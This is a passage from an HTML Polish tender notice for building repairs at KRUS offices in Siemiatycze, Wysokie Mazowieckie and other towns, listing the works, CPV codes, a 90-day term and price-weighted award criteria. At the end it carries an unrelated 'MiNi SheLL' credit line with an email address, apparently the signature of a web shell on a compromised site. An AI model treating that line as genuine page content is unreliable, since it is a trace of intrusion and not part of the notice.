-remont schodów zewnętrznych (wymiana uszkodzonego gresu na kostkę brukową, wypoziomowanie), 
- naprawa lokalnie zapadniętej nawierzchni z kostki brukowej wewnętrznej drogi komunikacyjnej.
f)	PT KRUS w Siemiatyczach, ul. Pałacowa 23:
-	naprawa czapki główki kominowej,
-	wymiana kratek wentylacyjnych,
-	przełożenie lokalnie zapadniętej opaski z kostki betonowej,
-	malowanie kominów, 
-	remont murku oporowego na tarasie i schodach zewnętrznych,
-	wymiana wykładziny PCV na korytarzu na I piętrze wraz z wyrównaniem posadzki. 
g)	PT KRUS w Wysokiem Mazowieckiem, Plac Odrodzenia 9: 
-naprawa uszkodzonego stopnia włazowego na dach, 
-wykonanie nowej powłoki zabezpieczającej czapek kominowych.
2)	Szczegółowy opis części III zamówienia zawiera załącznik nr 10 do SIWZ - Przedmiar robót OR KRUS w Białymstoku, PT KRUS w Augustowie, Grajewie, Hajnówce, Mońkach, Siemiatyczach, Wysokiem Mazowieckiem oraz załącznik nr 11 - Przedmiar wykonania mebli i zestawienie wyposażenia w dwóch pomieszczeniach socjalnych w PT KRUS w Augustowie; rysunek z wymiarami (wizualizacja).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.11-5, 45.44.21.00-8, 45.45.30.00-7, 39.14.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com